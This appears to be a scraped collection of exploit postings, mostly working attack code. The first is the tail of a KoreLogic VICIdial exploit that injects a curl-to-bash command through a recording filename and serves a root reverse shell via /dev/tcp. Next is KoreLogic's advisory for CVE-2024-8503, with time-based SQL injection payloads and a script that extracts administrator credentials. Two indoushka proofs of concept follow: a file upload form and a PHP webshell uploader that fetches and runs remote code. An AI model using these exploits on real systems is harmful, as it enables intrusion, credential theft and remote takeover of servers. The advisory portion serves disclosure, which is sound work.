f"3133731337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS.c&&bash$IFS.c)" record1_body = { "server_ip":self.TARGET_IP,"session_name":session_name,"user":username,"pass":password, "ACTION":"MonitorConf","format":"text","channel":f"Local/{recording_extension}@default","filename":malicious_filename, "exten":recording_extension,"ext_context":"default","lead_id":"","ext_priority":"1","FROMvdc":"YES", "uniqueid":"","FROMapi":"" } response = session.post(f'{self.base_uri}/agc/manager_send.php', headers=request_headers, data=record1_body) recording_id = re.findall(r'RecorDing_ID: ([0-9]+)', response.text)[0] # stop malicious recording to prevent file size from growing record2_body = { "server_ip":self.TARGET_IP,"session_name":session_name,"user":username, "pass":password,"ACTION":"StopMonitorConf","format":"text","channel":f"Local/{recording_extension}@default", "filename":f"ID:{recording_id}","exten":session_id,"ext_context":"default","lead_id":"","ext_priority":"1", "FROMvdc":"YES","uniqueid":"","FROMapi":"" } response = session.post(f'{self.base_uri}/agc/conf_exten_check.php', headers=request_headers, data=record2_body) # returns administrator username and password by # exploiting time-based SQL injection. def extract_admin_credentials(self, session): print('[~] Enumerating administrator credentials') username_charset = string.ascii_letters + string.digits admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1" admin_username = self.enumerate_sql_query(session, admin_username_query, username_charset) print(f'[+] Username: {admin_username}') password_charset = string.ascii_letters + string.digits + '-.+/=_' admin_password_query = f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1" admin_password = self.enumerate_sql_query(session, admin_password_query, password_charset) print(f'[+] Password: {admin_password}') return admin_username, admin_password # emulates a webserver to deliver exploit script def payload_webserver(self): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((self.PAYLOAD_WEBSERVER_HOST, int(self.PAYLOAD_WEBSERVER_PORT))) server.listen(1) while True: client, incoming_address = server.accept() message = client.recv(100) if b'User-Agent: curl' in message: break else: client.close() print(f'[+] Received cURL request from {incoming_address[0]}') exploit_script = f"#!/bin/bash\nbash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1" http_response = f"HTTP/1.1 200 OK\r\n" http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n" http_response += exploit_script client.sendall(http_response.encode()) client.close() # starts a netcat process to catch the incoming reverse shell def netcat_listener(self): os.system(f'nc -nlvs {self.REVERSE_SHELL_HOST} -p {self.REVERSE_SHELL_PORT}') # binds to provided addresses and handles incoming connections def prepare_listeners(self): webserver = threading.Thread(target=self.payload_webserver) netcat = threading.Thread(target=self.netcat_listener) print('[~] Listening for incoming connections...') netcat.start() webserver.start() # establish a reverse shell as root from the vicidial instance def shell(self): session = self.build_requests_session() is_vulnerable = self.is_vulnerable(session) if is_vulnerable: print('[+] Target appears vulnerable to time-based SQL injection') else: print('[-] Failed to perform time-based SQL injection') return username, password = self.extract_admin_credentials(session) self.poison_recording_files(session, username, password) # prepare exploit listeners if configured if self.BIND: self.prepare_listeners() if __name__ == '__main__': argparser = argparse.ArgumentParser(description='Exploit for CVE-2024-XXXXX: Unauthenticated SQLi to RCE as root') required = argparser.add_argument_group('Required Arguments') optional = argparser.add_argument_group('Optional Arguments') required.add_argument('-rh', '--rhost', required=True, help='Vicidial Server IP address') required.add_argument('-rp', '--rport', required=True, help='Vicidial Server port number') required.add_argument('-wh', '--whost', required=True, help='Malicious webserver IP address') required.add_argument('-wp', '--wport', required=True, help='Malicious webserver port number') required.add_argument('-lh', '--lhost', required=False, help='Reverse shell listener IP address') required.add_argument('-lp', '--lport', required=False, help='Reverse shell listener port number') optional.add_argument('-b', '--bind', required=False, help='Bind to [lhost:lport] and [whost:wport] and handle connections automatically', action='store_true', default=False) optional.add_argument('-p', '--proxy', required=False, help='HTTP[S] proxy to use for outbound requests', default=None) arguments = argparser.parse_args() exploit = Exploit( rhost = arguments.rhost, rport = arguments.rport, whost = arguments.whost, wport = arguments.wport, lhost = arguments.lhost, lport = arguments.lport, bind = arguments.bind, proxy = arguments.proxy ) exploit.shell() The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy </code></pre>

<pre><code>KL-001-2024-011: VICIdial Unauthenticated SQL Injection Title: VICIdial Unauthenticated SQL Injection Advisory ID: KL-001-2024-011 Publication Date: 2024-09-10 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt 1. Vulnerability Details Affected Vendor: VICIdial Affected Product: VICIdial Affected Version: 2.14-917a Platform: GNU/Linux CWE Classification: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') CVE ID: CVE-2024-8503 2. Vulnerability Description An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database. 3. Technical Description VICIdial is an open-source contact center suite, mainly used by call centers. The "vicidial.com" website boasts over 14,000 registered installations. There is a public SVN repository to access the source code, as well as an ISO that can be used to install the software. The ISO was used in a virtual machine for testing purposes. When performing SQL queries, VICIdial does not use prepared statements, but instead uses the "preg_replace" PHP function to remove problematic characters in user-controlled input before interpolating the variable into a SQL query. This is largely an effective solution, as regular expressions like "/[^-_0-9a-zA-Z]/" are passed to "preg_replace", which essentially limits input to the characters shown in the pattern (letters, numbers, underscores, and hyphens). However, these scripts do not utilize a shared PHP file for performing sanitization uniformly. Instead, each script individually implements the "preg_replace" function, leading to inconsistencies in which patterns are used and where they are applied. For example, providing credentials via the "Authorization" request header using the "Basic" scheme, most PHP scripts sanitize the username value with the following line: $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/','',$PHP_AUTH_USER); However, the "VERM_AJAX_functions.php" PHP script does not perform any sanitization before inserting the username into a SQL "INSERT" statement: $PHP_AUTH_USER=$_SERVER['PHP_AUTH_USER']; $PHP_AUTH_PW=$_SERVER['PHP_AUTH_PW']; ... if ($function=="log_custom_report") { $rpt_log_stmt="insert ignore into verm_custom_report_holder(user, report_name, report_parameters) values('$PHP_AUTH_USER', '$custom_report_name', '$LOGhttp_referer') ON DUPLICATE KEY UPDATE report_name='$custom_report_name', report_parameters='$custom_report_vars'"; $rpt_log_rslt=mysql_to_mysqli($rpt_log_stmt, $link); return mysqli_affected_rows($rpt_log_rslt); } Since "VERM_AJAX_functions.php" can be accessed without authentication, this creates a straight forward unauthenticated SQL injection vulnerability. While the page response cannot be manipulated by the execution of the query, delays in the page response can be observed when using SQL functions such as "sleep()", enabling the enumeration of database values using time-based SQL injection: $ time curl -u "foo:bar" \ http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report real 0m0.019s <--- (normal response time) user 0m0.004s sys 0m0.008s $ time curl -u "','',sleep(5));#:bar" \ http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report real 0m5.023s <--- (5-second delay in response time) user 0m0.003s sys 0m0.008s This observable difference can be used to craft queries that sleep under specific conditions, allowing an attacker to ask "Yes or No" questions. In the following example, the "sleep()" function is called only if the provided string matches the database version: $ time curl -u \ "','',IF(@@version='korelogic',sleep(5),NULL));#:bar" \ http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report real 0m0.024s <--- (normal response time) user 0m0.006s sys 0m0.003s $ time curl -u \ "','',IF(@@version='10.6.14-MariaDB-log',sleep(5),NULL));#:bar" \ http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report real 0m5.019s <--- (5-second delay in response time) user 0m0.004s sys 0m0.008s 4. Mitigation and Remediation Recommendation This issue has been remediated in the public svn/trunk codebase, as of revision 3848 committed 2024-07-08. 5. Credit This vulnerability was discovered by Jaggar Henry of KoreLogic, Inc. 6. Disclosure Timeline 2024-07-05 : KoreLogic requests security contact from support@vicidial.com. 2024-07-08 : KoreLogic reports vulnerability details to VICIdial contact. 2024-07-08 : VICIdial notifies KoreLogic that the issue has been remediated with revision 3848 in the public Subversion repository. 2024-07-11 : KoreLogic confirms this vulnerability has been remediated. KoreLogic asks VICIdial if it is appropriate to publicly disclose the vulnerability details at this time. 2024-07-11 : VICIdial requests four weeks of embargo in order to upgrade supported customers. 2024-08-05 : KoreLogic asks VICIdial if it is appropriate to publicly disclose the vulnerability details at this time. 2024-08-09 : VICIdial requests an additional two weeks of embargo. 2024-09-10 : KoreLogic public disclosure. 7. Proof of Concept The following script can be used to automate the exploitation process and enumerate the results of provided queries: $ time python unauth_sqli.py -rh vicidial.zz -rp 443 -q 'SELECT @@version' [+] Target appears vulnerable to time-based SQL injection [~] Executing SQL: SELECT @@version [~] 1 [~] 10 [~] 10. [~] 10.6 [~] 10.6. [~] 10.6.1 [~] 10.6.14 [~] 10.6.14- [~] 10.6.14-M [~] 10.6.14-Ma [~] 10.6.14-Mar [~] 10.6.14-Mari [~] 10.6.14-Maria [~] 10.6.14-MariaD [~] 10.6.14-MariaDB [~] 10.6.14-MariaDB- [~] 10.6.14-MariaDB-l [~] 10.6.14-MariaDB-lo [~] 10.6.14-MariaDB-log real 0m6.727s user 0m0.425s sys 0m0.020s ############################## ## unauth_sqli.py ## ############################## import string import random import urllib3 import argparse import requests from base64 import b64encode urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class Exploit: def __init__(self, rhost, rport, proxy=None): """ This 'sleep' duration is derived by the average response time multiplied by this value. A server with an average response time of 10ms is given a 'sleep' duration of 300ms. Tune as needed. """ self.SLEEP_MULTIPLIER = 30 self.REQUEST_HEADERS = {'User-Agent': 'KoreLogic'} self.ALLOWED_SCHEMES = ['http', 'https'] if proxy: self.REQUEST_PROXIES = { 'http': proxy, 'https': proxy } else: self.REQUEST_PROXIES = {} self.TARGET_IP = rhost self.TARGET_PORT = rport self.VICIDIAL_FINGERPRINT = 'Please Hold while I redirect you!' self.RANDOM_CHARSET = string.ascii_uppercase + string.digits # returns a URI with 'http' or 'https' def determine_target_uri(self): for scheme in self.ALLOWED_SCHEMES: target_uri = f'{scheme}://{self.TARGET_IP}:{self.TARGET_PORT}' try: response = requests.get(target_uri, headers=self.REQUEST_HEADERS, verify=False) if self.VICIDIAL_FINGERPRINT in response.text: return target_uri except: pass # returns a session object with custom proxies/headers if supplied def build_requests_session(self): self.base_uri = self.determine_target_uri() session = requests.Session() session.proxies = self.REQUEST_PROXIES session.verify = False return session # returns a random string of a given length def random(self, length): return ''.join(random.choice(self.RANDOM_CHARSET) for _ in range(length)) # returns a timedelta representing the response time of an injected SQL query def time_sql_query(self, query, session): username = f"goolicker', '', ({query}));# " credentials = f'{username}:password' credentials_base64 = b64encode(credentials.encode()).decode() auth_header = f'Basic {credentials_base64}' target_uri = f'{self.base_uri}/VERM/VERM_AJAX_functions.php' request_params = {'function': 'log_custom_report', self.random(5): self.random(5)} request_headers = {**self.REQUEST_HEADERS, 'Authorization': auth_header} response = session.get(target_uri, params=request_params, headers=request_headers) return response.elapsed # returns a boolean if time-based SQL injection is possible, additionally # sets the best 'sleep' duration based on response times def is_vulnerable(self, session, baseline_iterations=5): # determine average baseline response time zero_sleep_query = f'SELECT (NULL)' total_baseline_time = 0 for _ in range(baseline_iterations): execution_time = self.time_sql_query(zero_sleep_query, session) total_baseline_time += execution_time.total_seconds() average_baseline_response_time = total_baseline_time / baseline_iterations self.sql_baseline_time = average_baseline_response_time # determine if injected sleep query impacts response time sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2) sleep_query = f'SELECT (sleep({sleep_length}))' execution_time = self.time_sql_query(sleep_query, session) if execution_time.total_seconds() >= sleep_length: self.sql_sleep_length = sleep_length return True else: return False # determine if a character at a specific indice of a query result returns a # boolean 'true' when compared to a given character using the supplied operator def check_indice_of_query_result(self, session, query, indice, operator, ordinal): parent_query = f'SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)' execution_time = self.time_sql_query(parent_query, session) return execution_time.total_seconds() >= (self.sql_baseline_time * self.SLEEP_MULTIPLIER) def enumerate_sql_query(self, session, query='SELECT @@version', charset=string.printable): # convert charset to ordinals all_characters = sorted([ord(char) for char in charset]) reduced_characters = all_characters # use a binary search and enumerate query results result = '' indice = 1 indice_could_be_null = True while True: """ we check if the value is NULL once per indice to determine when a string ends. this adds one request per indice, but since every boolean 'true' results in a delay this is faster than counting the length of the string before enumrating. """ if indice_could_be_null: if self.check_indice_of_query_result(session, query, indice, '=', '0'): break else: indice_could_be_null = False # enumerate each character of query result with a binary search middle_indice = len(reduced_characters) // 2 middle_ordinal = reduced_characters[middle_indice] if self.check_indice_of_query_result(session, query, indice, '<=', middle_ordinal): if self.check_indice_of_query_result(session, query, indice, '=', middle_ordinal): reduced_characters = all_characters result += chr(middle_ordinal) indice += 1 indice_could_be_null = True print(f'[~] {result}') else: reduced_characters = reduced_characters[:middle_indice] else: reduced_characters = reduced_characters[middle_indice:] return result # returns administrator username and password by # exploiting time-based SQL injection. def extract_admin_credentials(self, session): print('[~] Enumerating administrator credentials') username_charset = string.ascii_letters + string.digits admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1" admin_username = self.enumerate_sql_query(session, admin_username_query, username_charset) print(f'[+] Username: {admin_username}') password_charset = string.ascii_letters + string.digits + '-.+/=_' admin_password_query = f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1" admin_password = self.enumerate_sql_query(session, admin_password_query, password_charset) print(f'[+] Password: {admin_password}') return admin_username, admin_password # injects SQL queries and enumerates results if instance is vulnerable def exploit(self, custom_query=None): session = self.build_requests_session() is_vulnerable = self.is_vulnerable(session) if is_vulnerable: print('[+] Target appears vulnerable to time-based SQL injection') else: print('[-] Failed to perform time-based SQL injection') return if custom_query: print(f'[~] Executing SQL: {custom_query}') self.enumerate_sql_query(session, custom_query) else: self.extract_admin_credentials(session) if __name__ == '__main__': argparser = argparse.ArgumentParser(description='Exploit for CVE-2024-XXXXX: Unauthenticated SQLi') required = argparser.add_argument_group('Required Arguments') optional = argparser.add_argument_group('Optional Arguments') required.add_argument('-rh', '--rhost', required=True, help='Vicidial Server IP address') required.add_argument('-rp', '--rport', required=True, help='Vicidial Server port number') optional.add_argument('-q', '--query', required=False, help='Custom SQL query to execute', default=None) optional.add_argument('-p', '--proxy', required=False, help='HTTP[S] proxy to use for outbound requests', default=None) arguments = argparser.parse_args() exploit = Exploit( rhost = arguments.rhost, rport = arguments.rport, proxy = arguments.proxy ) exploit.exploit(custom_query=arguments.query) The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy </code></pre>

<pre><code>============================================================================================================================================= | # Title : Queuing Simple Chatbot 1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/queuing.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload PHP malicious files directly. [+] Line 33 set url of target. [+] The path to upload the files : http://127.0.0.1/chatbot/uploads/ [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Direct arbitrary File Upload</title> </head> <body> <h2>Direct arbitrary File Upload</h2> <form id="uploadForm"> <label for="fileInput">Select File:</label> <input type="file" id="fileInput" name="fileInput" required> <button type="button" onclick="uploadFile()">Upload File</button> </form> <script> function uploadFile() { const fileInput = document.getElementById('fileInput').files[0]; if (!fileInput) { alert('Please select a file.'); return; } const formData = new FormData(); formData.append('name', '<marquee>Hacked by indoushka</marquee>'); formData.append('img', fileInput); console.log("(+) Uploading file..."); fetch('http://127.0.0.1/chatbot/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL method: 'POST', body: formData }) .then(response => response.text()) .then(data => { if (data === '1') { console.log("(+) File upload seems to have been successful!"); } else { console.log("(-) Oh no, the file upload seems to have failed!"); } }) .catch(error => console.error("(-) Error during file upload:", error)); } </script> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : Profiling System 1.0 code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload injects php code of your choice into an SHELL.php file. [+] Line 26 Line 35 [+] change the path of the script folder. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php 127.0.0.1 [+] payload : <?php function file_upload($target_ip) { $file_name = "indoushka.php"; $webshell_payload = "<?php \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt'; \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$output = curl_exec(\$ch); curl_close(\$ch); if (\$output) { include 'data://text/plain;base64,' . base64_encode(\$output); } ?>"; $post_fields = array( 'upload' => '', 'per_file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name), 'per_name' => 'inouva', 'file_name' => '123', 'qty' => '1' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$target_ip/ProfilingSystem/add_file_query.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "(+) Shell uploaded successfully.\n"; echo "(+) Access the shell at: http://$target_ip/ProfilingSystem/uploads/$file_name\n"; } if ($argc != 2) { echo "(+) Usage: php " . $argv[0] . " <target ip>\n"; echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n"; exit(-1); } $target_ip = $argv[1]; file_upload($target_ip); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>